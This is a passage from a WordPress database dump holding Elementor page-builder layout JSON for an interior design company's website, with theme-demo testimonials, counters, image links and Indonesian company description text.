solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3678,4846,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3679,4846,'_elementor_pro_version','3.8.1'),(3680,4847,'_wp_page_template','elementor_header_footer'),(3681,4847,'_elementor_edit_mode','builder'),(3682,4847,'_elementor_template_type','wp-page'),(3683,4847,'_elementor_version','3.8.1'),(3684,4847,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"\\\"Let\'s turn your ideas into reality\\\"\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike 